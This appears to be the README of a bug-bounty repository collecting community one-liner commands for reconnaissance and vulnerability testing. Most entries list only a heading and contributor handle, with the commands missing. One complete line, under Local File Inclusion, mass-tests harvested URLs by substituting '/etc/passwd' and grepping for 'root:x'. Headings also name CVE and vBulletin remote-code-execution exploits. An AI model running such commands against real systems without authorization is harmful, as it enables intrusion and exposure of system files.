Awesome One-liner Bug Bounty
A collection of awesome one-liner scripts especially for bug bounty.
This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
Definitions
This section defines specific terms or placeholders that are used throughout one-line command/scripts.
1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by
internal.host,domain.tld,sub.domain.tld, or127.0.0.1.1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
2.1. "URL" definitely defines the URL, e.g. replaced by
http://domain.tld/path/page.htmlor somewhat starting with HTTP/HTTPS protocol.2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
3.1. "FILE.txt" or "FILE
{N}.txt" means the files needed to run the command/script according to its context and needs.4.1. "OUT.txt" or "OUT
{N}.txt" means the file as the target storage result will be the command that is executed.
Local File Inclusion
@dwisiswant0
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'Open-redirect
@dwisiswant0
@N3T_hunt3r
XSS
@cihanmehmet
@fanimalikhack
@oliverrickfors
Prototype Pollution
@R0X4R
CVE-2020-5902
@Madrobot_
CVE-2020-3452
@vict0ni
CVE-2022-0378
@7h3h4ckv157
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
@Madrobot_
Find JavaScript Files
@D0cK3rG33k
Extract Endpoints from JavaScript
@renniepak
Get CIDR & Org Information from Target Lists
@steve_mcilwain
Get Subdomains from RapidDNS.io
@andirrahmani1
Get Subdomains from BufferOver.run
@_ayoubfathi_
@AnubhavSingh_
Get Subdomains from Riddler.io
@pikpikcu
Get Subdomains from VirusTotal
@pikpikcu
Get Subdomain with cyberxplore
@pikpikcu
Get Subdomains from CertSpotter
@caryhooper
Get Subdomains from Archive
@pikpikcu
Get Subdomains from JLDC
@pikpikcu
Get Subdomains from securitytrails
@pikpikcu
Bruteforcing Subdomain using DNS Over
@pikpikcu
Get Subdomains With sonar.omnisint.io
@pikpikcu
Get Subdomains With synapsint.com
@pikpikcu
Get Subdomains from crt.sh
@vict0ni
Sort & Tested Domains from Recon.dev
@stokfedrik
Subdomain Bruteforcer with FFUF
@GochaOqradze
Find Allocated IP Ranges for ASN from IP Address
wains.be
Extract IPs from a File
@emenalf
Ports Scan without CloudFlare
@dwisiswant0
Create Custom Wordlists
@tomnomnom
Extracts Juicy Informations
@Prial Islam Khan
Find Subdomains TakeOver
@hahwul
Dump Custom URLs from ParamSpider
@hahwul
URLs Probing with cURL + Parallel
@akita_zen
Dump In-scope Assets from chaos-bugbounty-list
chaos-bugbounty-list@dwisiswant0
Dump In-scope Assets from bounty-targets-data
bounty-targets-data@dwisiswant0
HackerOne Programs
BugCrowd Programs
Intigriti Programs
YesWeHack Programs
HackenProof Programs
Federacy Programs
Dump URLs from sitemap.xml
@healthyoutlet
Pure Bash Linkfinder
@ntrzz
Extract Endpoints from swagger.json
@zer0pwn
CORS Misconfiguration
@manas_hunter
Find Hidden Servers and/or Admin Panels
@rez0__
Recon Using api.recon.dev
@z0idsec
Find Live Host/Domain/Assets
@YashGoti
XSS without gf
@HacktifyS
Get Subdomains from IPs
@laughface809
Gather Domains from Content-Security-Policy
@geeknik
Nmap IP:PORT Parser Piped to HTTPX
@dwisiswant0
Last updated